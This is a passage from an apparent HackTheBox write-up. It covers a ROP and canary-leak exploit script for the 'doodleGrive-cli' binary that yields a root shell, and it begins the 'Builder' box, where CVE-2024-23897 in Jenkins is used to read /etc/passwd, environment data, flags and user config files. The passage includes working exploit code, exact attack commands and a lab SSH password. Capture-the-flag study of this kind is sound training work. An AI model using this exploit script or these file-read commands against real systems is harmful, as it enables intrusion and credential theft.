RBP: 0x7fffffffdad0 ("c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
RSP: 0x7fffffffda80 --> 0x66647830 ('0xdf')
RIP: 0x402327 (<main+314>: xor rcx,QWORD PTR fs:0x28)
R8 : 0x1e
R9 : 0x0
R10: 0x7fffffffda80 --> 0x66647830 ('0xdf')
R11: 0x246
R12: 0x4033c0 (<__libc_csu_fini>: endbr64)
R13: 0x0
R14: 0x4c3018 --> 0x448810 (<__strcpy_avx2>: endbr64)
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x402319 <main+300>: call 0x419ca0 <puts>
0x40231e <main+305>: mov eax,0x0
0x402323 <main+310>: mov rcx,QWORD PTR [rbp-0x8]
=> 0x402327 <main+314>: xor rcx,QWORD PTR fs:0x28
0x402330 <main+323>: je 0x402337 <main+330>
0x402332 <main+325>: call 0x456d30 <__stack_chk_fail_local>
0x402337 <main+330>: leave
0x402338 <main+331>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffda80 --> 0x66647830 ('0xdf')
0008| 0x7fffffffda88 --> 0x2
0016| 0x7fffffffda90 ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0024| 0x7fffffffda98 ("2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0032| 0x7fffffffdaa0 ("a5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0040| 0x7fffffffdaa8 ("Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0048| 0x7fffffffdab0 ("0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0056| 0x7fffffffdab8 ("b3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000000000402327 in main ()
This value is the part of the pattern that ended up as the canary. pattern_offset
will show how far into the pattern that is:
oxdf@hacky$ pattern_offset -q 4130634139624138
[*] Exact match at offset 56
So I want 56 bytes then the leaked canary and then the return address.
My strategy is going to be to call system("/bin/sh")
. I’ll need a /bin/sh
string to pass to system
. I can’t send it myself, as /
is a banned character. But it exists in the binary:
oxdf@hacky$ strings -a -t x doodleGrive-cli | grep bin/sh
97cd5 /bin/sh
Because the binary has PIE disabled, this should be at the same place every time:
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
I’ll also need the address of system
(and exit
if I want to be clean), and those are easily found with pwntools
in Python by loading the binary (elf = ELF("./doodleGrive-cli")
) and then referencing the addresses (elf.sym.system
and elf.sym.exit
).
Finally, I need two gadgets. In 64-bit, the first argument to system
will be the string at the address in RDI. So I need a pop $rdi; ret
gadget. I’ll also need a plain ret
gadget for stack alignment.
Ropper is a nice tool for this:
oxdf@hacky$ ropper -f ./doodleGrive-cli --search "pop rdi"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi
[INFO] File: ./doodleGrive-cli
0x000000000044734d: pop rdi; add eax, dword ptr [rax]; add byte ptr [rax - 0x7d], cl; ret 0x4910;
0x00000000004569a0: pop rdi; call rax;
0x00000000004569a0: pop rdi; call rax; mov rdi, rax; mov eax, 0x3c; syscall;
0x00000000004675cd: pop rdi; idiv esi; jmp qword ptr [rsi + 0x2e];
0x0000000000436eb9: pop rdi; in al, dx; mov qword ptr [rdi - 0xc], rcx; mov dword ptr [rdi - 4], edx; ret;
0x0000000000436cc9: pop rdi; in eax, dx; mov qword ptr [rdi - 0xb], rcx; mov dword ptr [rdi - 4], edx; ret;
0x000000000042831d: pop rdi; jmp rax;
0x000000000041935f: pop rdi; or byte ptr [rbx - 0x76fefbb9], al; ret 0xe281;
0x0000000000410a40: pop rdi; or eax, dword ptr [rax]; syscall;
0x0000000000436ae9: pop rdi; out dx, al; mov qword ptr [rdi - 0xa], rcx; mov dword ptr [rdi - 4], edx; ret;
0x0000000000436919: pop rdi; out dx, eax; mov qword ptr [rdi - 9], r8; mov dword ptr [rdi - 4], edx; ret;
0x0000000000436a15: pop rdi; out dx, eax; mov qword ptr [rdi - 9], rcx; mov byte ptr [rdi - 1], dl; ret;
0x0000000000436961: pop rdi; out dx, eax; mov qword ptr [rdi - 9], rcx; mov dword ptr [rdi - 4], edx; ret;
0x0000000000403a4b: pop rdi; pop rbp; ret;
0x0000000000401912: pop rdi; ret;
The last one looks perfect. And 0x401913 (one byte after) is just ret
.
I’ll generate the following script:
from pwn import *
elf = ELF("./doodleGrive-cli")
# addresses
pop_rdi = p64(0x401912) # ropper -f ./doodleGrive-cli --search "pop rdi"
ret = p64(0x401913) # just return from previous
bin_sh = p64(0x497cd5) # strings -a -t x doodleGrive-cli | grep bin/sh
if args.SSH:
ssh = ssh(host="drive.htb", user="tom", password="johnmayer7")
p = ssh.process("/home/tom/doodleGrive-cli")
prompt = ""
else:
p = elf.process()
prompt = "$ "
#gdb.attach(p, """break *0x40229c\nc\n""")
# format string vuln to leak canary
p.readuntil(b"Enter Username:\n")
p.sendline(b"%15$lx")
p.readuntil(b"Enter password for ")
leak = p.readuntil(b":\n").strip(b"\n:")
canary = int(leak, 16)
info(f"Leak canary: 0x{canary}")
# build payload to ROP system("/bin/sh")
payload = b"A" * 56 # offset to canary
payload += p64(canary) # leaked canary
payload += b"A" * 8 # junk for stack pointer
payload += ret # ret for stack alignment
payload += pop_rdi # go to pop rdi gadget
payload += bin_sh # address of "/bin/sh" to pop into RDI
payload += p64(elf.sym.system) # return to system
payload += p64(elf.sym.exit) # return to exit
p.sendline(payload)
# clear message
p.readuntil(b"Invalid username or password.")
# reset path cleared by binary
p.sendline(b"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")
p.interactive(prompt=prompt)
Running this locally gives a shell:
oxdf@hacky$ python sploit.py
[*] '/media/sf_CTFs/hackthebox/drive-10.10.11.235/doodleGrive-cli'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/media/sf_CTFs/hackthebox/drive-10.10.11.235/doodleGrive-cli': pid 778049
[*] Leak canary: 0x16285182807784140032
[*] Switching to interactive mode
$ id
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
If I give it the SSH
argument, it works remotely:
oxdf@hacky$ python sploit.py SSH
[*] '/media/sf_CTFs/hackthebox/drive-10.10.11.235/doodleGrive-cli'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Connecting to drive.htb on port 22: Done
[*] tom@drive.htb:
Distro Ubuntu 20.04
OS: linux
Arch: amd64
Version: 5.4.0
ASLR: Enabled
[+] Starting remote process bytearray(b'/home/tom/doodleGrive-cli') on drive.htb: pid 1743058
[*] Leak canary: 0x11875039814129743360
[*] Switching to interactive mode
# id
uid=0(root) gid=0(root) groups=0(root),1003(tom)
# cat /root/root.txt
641e7a5b************************
Builder is a neat box focused on a recent Jenkins vulnerability, CVE-2024-23897. It allows for partial file read and can lead to remote code execution. I’ll show how to exploit the vulnerability, explore methods to get the most of a file possible, find a password hash for the admin user and crack it to get access to Jenkins. From in Jenkins, I’ll find a saved SSH key and show three paths to recover it. First, dumping an encrypted version from the admin panel. Second, using it to SSH into the host and finding a copy there. And third by having the pipeline leak the key back to me.
Name | Builder Play on HackTheBox |
---|---|
Release Date | 12 Feb 2024 |
Retire Date | 12 Feb 2024 |
OS | Linux |
Base Points | Medium [30] |
N/A (non-competitive) | |
N/A (non-competitive) | |
Creators |
nmap
finds two open TCP ports, SSH (22) and HTTP (8080):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.10
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-09 12:55 EST
Nmap scan report for 10.10.11.10
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
oxdf@hacky$ nmap -p 22,8080 -sCV 10.10.11.10
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-09 12:55 EST
Nmap scan report for 10.10.11.10
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Jetty 10.0.18
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.18)
|_http-title: Dashboard [Jenkins]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.35 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 22.04 jammy.
There’s a robots.txt
file on the webserver on port 8080 disallowing bots to scan any of the site. And the title seems to be a Jenkins server. I’ve seen Jenkins before on HTB. Jeeves released in 2017, and Object was a part of the 2021 HackTheBox Uni CTF. I played with an RCE vulnerability in Jenkins (CVE-2019-1003000) on Jeeves in this 2019 blog post.
The site is a Jenkins instance:
The people tab shows one user, jennifer:
The build history is empty. The “Credentials” page shows some basic info:
There’s a single credential that is a root SSH private key:
I can’t get access to it.
The site is clearly Jenkins, which describes itself as:
The leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project.
As soon as I visit the page, the first request provides a JSESSIONID
cookie:
HTTP/1.1 200 OK
Date: Fri, 09 Feb 2024 18:21:41 GMT
Connection: close
X-Content-Type-Options: nosniff
Content-Type: text/html;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
Set-Cookie: JSESSIONID.680b9dc7=node0593121crjqec957avgei7j7h36.node0; Path=/; HttpOnly
X-Hudson: 1.395
X-Jenkins: 2.441
X-Jenkins-Session: 12cf4fc7
X-Frame-Options: sameorigin
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuoLwaR1Kews72rSEsEkyDUFAKfX2Wk1mS06hi9A56Bx34LBdMQK3n6yCy0nJaT/KJcSx5hXA6DA1yNKWevPUO9nmgDZWaKxDhW/3uLvFtW68YnadxFiP7HLnRNulCWkaHgVIW/71MPrR9jOfjQ/BLPjBCBkLAdBsrCVrZ0/A/yj6H8YBGQIDk8hRjsqtMM0EBPzH/TylyC7DmHWtIkZqvLH7PKTycZ54Lcv9i9NVd/cLBZjEyzUua6n28OVsZif9yQ41qPmzwRlhZ7DAKi1wI48T+FatD9gz8v6KtjkftDht3CyT+GLYwUPy7z501y/RoOzldBpY2tgxvNTpIQgoDwIDAQAB
Content-Length: 14972
Server: Jetty(10.0.18)
That makes sense, as Jenkins is a Java application. The server is Jetty, a Java web server.
I’m going to skip the directory brute force given that I know exactly what this application is.
CVE-2024-23897 is the reason this box was released by HTB as a non-competitive box to showcase this hot vulnerability. It was first discussed mid-January 2024, with Jenkins making a Security Advisory on 24 January here. The title is “Arbitrary file read vulnerability through the CLI can lead to RCE.
Jenkins has a CLI interface to control it from a scripted / automation / shell environment. In that, a feature was added where a @[filepath]
would be replaced with the contents of the file. This leads to a file read.
The advisory shows five ways this can be leverages into remote coded execution, as well as some other abuses.
The Jenkins CLI documentation shows that you actually get the CLI JAR from the Jenkins instance. I’ll download it:
oxdf@hacky$ wget http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar
--2024-02-09 14:18:41-- http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar
Connecting to 10.10.11.10:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3623400 (3.5M) [application/java-archive]
Saving to: ‘jenkins-cli.jar’
jenkins-cli.jar 100%[====================>] 3.46M 3.34MB/s in 1.0s
2024-02-09 14:18:42 (3.34 MB/s) - ‘jenkins-cli.jar’ saved [3623400/3623400]
On running it, I’ll give it help
and then a non-existent command, and it prints all the commands:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help 0xdf
add-job-to-view
Adds jobs to view.
build
Builds a job, and optionally waits until its completion.
cancel-quiet-down
Cancel the effect of the "quiet-down" command.
clear-queue
Clears the build queue.
connect-node
Reconnect to a node(s)
console
Retrieves console output of a build.
copy-job
Copies a job.
create-credentials-by-xml
Create Credential by XML
create-credentials-domain-by-xml
Create Credentials Domain by XML
create-job
Creates a new job by reading stdin as a configuration XML file.
create-node
Creates a new node by reading stdin as a XML configuration.
create-view
Creates a new view by reading stdin as a XML configuration.
declarative-linter
Validate a Jenkinsfile containing a Declarative Pipeline
delete-builds
Deletes build record(s).
delete-credentials
Delete a Credential
delete-credentials-domain
Delete a Credentials Domain
delete-job
Deletes job(s).
delete-node
Deletes node(s)
delete-view
Deletes view(s).
disable-job
Disables a job.
disable-plugin
Disable one or more installed plugins.
disconnect-node
Disconnects from a node.
enable-job
Enables a job.
enable-plugin
Enables one or more installed plugins transitively.
get-credentials-as-xml
Get a Credentials as XML (secrets redacted)
get-credentials-domain-as-xml
Get a Credentials Domain as XML
get-job
Dumps the job definition XML to stdout.
get-node
Dumps the node definition XML to stdout.
get-view
Dumps the view definition XML to stdout.
groovy
Executes the specified Groovy script.
groovysh
Runs an interactive groovy shell.
help
Lists all the available commands or a detailed description of single command.
import-credentials-as-xml
Import credentials as XML. The output of "list-credentials-as-xml" can be used as input here as is, the only needed change is to set the actual Secrets which are redacted in the output.
install-plugin
Installs a plugin either from a file, an URL, or from update center.
keep-build
Mark the build to keep the build forever.
list-changes
Dumps the changelog for the specified build(s).
list-credentials
Lists the Credentials in a specific Store
list-credentials-as-xml
Export credentials as XML. The output of this command can be used as input for "import-credentials-as-xml" as is, the only needed change is to set the actual Secrets which are redacted in the output.
list-credentials-context-resolvers
List Credentials Context Resolvers
list-credentials-providers
List Credentials Providers
list-jobs
Lists all jobs in a specific view or item group.
list-plugins
Outputs a list of installed plugins.
mail
Reads stdin and sends that out as an e-mail.
offline-node
Stop using a node for performing builds temporarily, until the next "online-node" command.
online-node
Resume using a node for performing builds, to cancel out the earlier "offline-node" command.
quiet-down
Quiet down Jenkins, in preparation for a restart. Don’t start any builds.
reload-configuration
Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk.
reload-job
Reload job(s)
remove-job-from-view
Removes jobs from view.
replay-pipeline
Replay a Pipeline build with edited script taken from standard input
restart
Restart Jenkins.
restart-from-stage
Restart a completed Declarative Pipeline build from a given stage.
safe-restart
Safe Restart Jenkins. Don’t start any builds.
safe-shutdown
Puts Jenkins into the quiet mode, wait for existing builds to be completed, and then shut down Jenkins.
session-id
Outputs the session ID, which changes every time Jenkins restarts.
set-build-description
Sets the description of a build.
set-build-display-name
Sets the displayName of a build.
shutdown
Immediately shuts down Jenkins server.
stop-builds
Stop all running builds for job(s)
update-credentials-by-xml
Update Credentials by XML
update-credentials-domain-by-xml
Update Credentials Domain by XML
update-job
Updates the job definition XML from stdin. The opposite of the get-job command.
update-node
Updates the node definition XML from stdin. The opposite of the get-node command.
update-view
Updates the view definition XML from stdin. The opposite of the get-view command.
version
Outputs the current version.
wait-node-offline
Wait for a node to become offline.
wait-node-online
Wait for a node to become online.
who-am-i
Reports your credential and permissions.
ERROR: No such command 0xdf. Available commands are above.
Those command run as well:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' who-am-i
Authenticated as: anonymous
Authorities:
anonymous
From the advisory, I can try putting in a file reference:
It’s trying to load /etc/passwd
as arguments for the help command. The first line is the command (root
), and the next is an unexpected argument. That’s partial file read for sure. For one line files, this is enough (adding an extra arg, in this case “a”, makes the output much shorter):
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/etc/hostname' a
ERROR: Too many arguments: a
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: 0f52c222a4cc)
The hostname is “0f52c222a4cc”.
There are Python POCs out there on GitHub that will do a similar thing. They don’t really add anything over the JAR file, so I prefer that method. They do work to make similar output:
oxdf@hacky$ python CVE-2024-23897/poc.py http://10.10.11.10:8080/ /etc/passwd
REQ: b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
RESPONSE: b'\x00\x00\x00\x00\x01\x08\n\x00\x00\x00K\x08ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n\x00\x00\x00\x1e\x08java -jar jenkins-cli.jar help\x00\x00\x00\n\x08 [COMMAND]\x00\x00\x00\x01\x08\n\x00\x00\x00N\x08Lists all the available commands or a detailed description of single command.\n\x00\x00\x00J\x08 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)\n\x00\x00\x00\x04\x04\x00\x00\x00\x02'
In this video, I explore the vulnerability, walk through exploitation with both the JAR and the Python POC, and show the path to finding a method to leak more lines:
By the end of the video, I’ve got this output:
oxdf@hacky$ cat commands | while read command; do echo "echo -n \"$command: \"; java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' $command '@/etc/passwd' 2>&1 | grep -oP ':\d+:\d+:' | sort -u | wc -l"; done > ipp.sh
oxdf@hacky$ bash ipp.sh
add-job-to-view: 1
build: 1
cancel-quiet-down: 1
clear-queue: 1
connect-node: 19
console: 1
copy-job: 1
create-credentials-by-xml: 1
create-credentials-domain-by-xml: 1
create-job: 1
create-node: 2
create-view: 2
declarative-linter: 1
delete-builds: 1
delete-credentials: 1
delete-credentials-domain: 1
delete-job: 19
delete-node: 19
delete-view: 19
disable-job: 1
disable-plugin: 0
disconnect-node: 19
enable-job: 1
enable-plugin: 0
get-credentials-as-xml: 1
get-credentials-domain-as-xml: 1
get-job: 1
get-node: 1
get-view: 1
groovy: 0
groovysh: 0
help: 2
import-credentials-as-xml: 1
install-plugin: 0
keep-build: 1
list-changes: 1
list-credentials: 1
list-credentials-as-xml: 1
list-credentials-context-resolvers: 1
list-credentials-providers: 1
list-jobs: 2
list-plugins: 2
mail: 1
offline-node: 19
online-node: 19
quiet-down: 1
reload-configuration: 1
reload-job: 19
remove-job-from-view: 1
replay-pipeline: 1
restart: 1
restart-from-stage: 1
safe-restart: 1
safe-shutdown: 1
session-id: 1
set-build-description: 1
set-build-display-name: 1
shutdown: 1
stop-builds: 1
update-credentials-by-xml: 1
update-credentials-domain-by-xml: 1
update-job: 1
update-node: 1
update-view: 1
version: 1
wait-node-offline: 1
wait-node-online: 1
who-am-i: 1
All of the “19” results seem equally good.
I’ll look at the running command to get a feel for what the environment looks like for Jenkins. The command line (/proc/self/cmdline
, cleaned up with spaces added) is:
java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -Dhudson.lifecycle=hudson.lifecycle.ExitLifecycle -jar /usr/share/jenkins/jenkins.war
The environment variables (/proc/self/environ
) are:
HOSTNAME=0f52c222a4cc
JENKINS_UC_EXPERIMENTAL=https://updates.jenkins.io/experimental
JAVA_HOME=/opt/java/openjdk
JENKINS_INCREMENTALS_REPO_MIRROR=https://repo.jenkins-ci.org/incrementals
COPY_REFERENCE_FILE_LOG=/var/jenkins_home/copy_reference_file.log
PWD=/
JENKINS_SLAVE_AGENT_PORT=50000
JENKINS_VERSION=2.441
HOME=/var/jenkins_home
LANG=C.UTF-8
JENKINS_UC=https://updates.jenkins.io
SHLVL=0
JENKINS_HOME=/var/jenkins_home
REF=/usr/share/jenkins/ref
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
I can actually read user.txt
at this point from the jenkins user’s home directory:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/var/jenkins_home/user.txt' a
ERROR: Too many arguments: a
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: ffcb78dc3a26226b97276f24e26fc272)
Jenkins stores the initial password for the admin user at /var/jenkins_home/secrets/initialAdminPassword
. Unfortunately, that returns “No such file”:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help '@/var/jenkins_home/secrets/initialAdminPassword' a
ERROR: No such file: /var/jenkins_home/secrets/initialAdminPassword
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command
Jenkins stores information about its user accounts in /var/jenkins_home/users/users.xml
. Using reload-node
, I’ll get the lines of that file, albeit a bit scrambed:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/users.xml'
<?xml version='1.1' encoding='UTF-8'?>: No such item ‘<?xml version='1.1' encoding='UTF-8'?>’ exists.
<string>jennifer_12108429903186576833</string>: No such item ‘ <string>jennifer_12108429903186576833</string>’ exists.
<idToDirectoryNameMap class="concurrent-hash-map">: No such item ‘ <idToDirectoryNameMap class="concurrent-hash-map">’ exists.
<entry>: No such item ‘ <entry>’ exists.
<string>jennifer</string>: No such item ‘ <string>jennifer</string>’ exists.
<version>1</version>: No such item ‘ <version>1</version>’ exists.
</hudson.model.UserIdMapper>: No such item ‘</hudson.model.UserIdMapper>’ exists.
</idToDirectoryNameMap>: No such item ‘ </idToDirectoryNameMap>’ exists.
<hudson.model.UserIdMapper>: No such item ‘<hudson.model.UserIdMapper>’ exists.
</entry>: No such item ‘ </entry>’ exists.
ERROR: Error occurred while performing this command, see previous stderr output.
Still, I can see a user “jennifer_12108429903186576833”, which matches the jennifer user on the site above. That is a directory name and in it will be a config.xml
:
oxdf@hacky$ java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml'
<hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">: No such item ‘ <hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">’ exists.
<hudson.search.UserSearchProperty>: No such item ‘ <hudson.search.UserSearchProperty>’ exists.
<roles>: No such item ‘ <roles>’ exists.
<jenkins.security.seed.UserSeedProperty>: No such item ‘ <jenkins.security.seed.UserSeedProperty>’ exists.
</tokenStore>: No such item ‘ </tokenStore>’ exists.
</hudson.search.UserSearchProperty>: No such item ‘ </hudson.search.UserSearchProperty>’ exists.
<timeZoneName></timeZoneName>: No such item ‘ <timeZoneName></timeZoneName>’ exists.
<properties>: No such item ‘ <properties>’ exists.
<jenkins.security.LastGrantedAuthoritiesProperty>: No such item ‘ <jenkins.security.LastGrantedAuthoritiesProperty>’ exists.
<flags/>: No such item ‘ <flags/>’ exists.
<hudson.model.MyViewsProperty>: No such item ‘ <hudson.model.MyViewsProperty>’ exists.
</user>: No such item ‘</user>’ exists.
</jenkins.security.ApiTokenProperty>: No such item ‘ </jenkins.security.ApiTokenProperty>’ exists.
<views>: No such item ‘ <views>’ exists.
<string>authenticated</string>: No such item ‘ <string>authenticated</string>’ exists.
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">: No such item ‘ <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">’ exists.
<user>: No such item ‘<user>’ exists.
<name>all</name>: No such item ‘ <name>all</name>’ exists.
<description></description>: No such item ‘ <description></description>’ exists.
<emailAddress>jennifer@builder.htb</emailAddress>: No such item ‘ <emailAddress>jennifer@builder.htb</emailAddress>’ exists.
<collapsed/>: No such item ‘ <collapsed/>’ exists.
</jenkins.security.seed.UserSeedProperty>: No such item ‘ </jenkins.security.seed.UserSeedProperty>’ exists.
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: No such item ‘ </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>’ exists.
</hudson.model.MyViewsProperty>: No such item ‘ </hudson.model.MyViewsProperty>’ exists.
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: No such item ‘ <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>’ exists.
<filterQueue>false</filterQueue>: No such item ‘ <filterQueue>false</filterQueue>’ exists.
<jenkins.security.ApiTokenProperty>: No such item ‘ <jenkins.security.ApiTokenProperty>’ exists.
<primaryViewName></primaryViewName>: No such item ‘ <primaryViewName></primaryViewName>’ exists.
</views>: No such item ‘ </views>’ exists.
</hudson.model.TimeZoneProperty>: No such item ‘ </hudson.model.TimeZoneProperty>’ exists.
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1319.v7eb_51b_3a_c97b_">: No such item ‘ <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1319.v7eb_51b_3a_c97b_">’ exists.
</hudson.model.PaneStatusProperties>: No such item ‘ </hudson.model.PaneStatusProperties>’ exists.
</hudson.tasks.Mailer_-UserProperty>: No such item ‘ </hudson.tasks.Mailer_-UserProperty>’ exists.
<tokenList/>: No such item ‘ <tokenList/>’ exists.
<jenkins.console.ConsoleUrlProviderUserProperty/>: No such item ‘ <jenkins.console.ConsoleUrlProviderUserProperty/>’ exists.
</hudson.model.AllView>: No such item ‘ </hudson.model.AllView>’ exists.
<timestamp>1707318554385</timestamp>: No such item ‘ <timestamp>1707318554385</timestamp>’ exists.
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>: No such item ‘ <owner class="hudson.model.MyViewsProperty" reference="../../.."/>’ exists.
</properties>: No such item ‘ </properties>’ exists.
</jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: No such item ‘ </jenkins.model.experimentalflags.UserExperimentalFlagsProperty>’ exists.
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: No such item ‘ </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>’ exists.
<hudson.security.HudsonPrivateSecurityRealm_-Details>: No such item ‘ <hudson.security.HudsonPrivateSecurityRealm_-Details>’ exists.
<insensitiveSearch>true</insensitiveSearch>: No such item ‘ <insensitiveSearch>true</insensitiveSearch>’ exists.
<properties class="hudson.model.View$PropertyList"/>: No such item ‘ <properties class="hudson.model.View$PropertyList"/>’ exists.
<hudson.model.TimeZoneProperty>: No such item ‘ <hudson.model.TimeZoneProperty>’ exists.
<hudson.model.AllView>: No such item ‘ <hudson.model.AllView>’ exists.
</hudson.security.HudsonPrivateSecurityRealm_-Details>: No such item ‘ </hudson.security.HudsonPrivateSecurityRealm_-Details>’ exists.
<providerId>default</providerId>: No such item ‘ <providerId>default</providerId>’ exists.
</roles>: No such item ‘ </roles>’ exists.
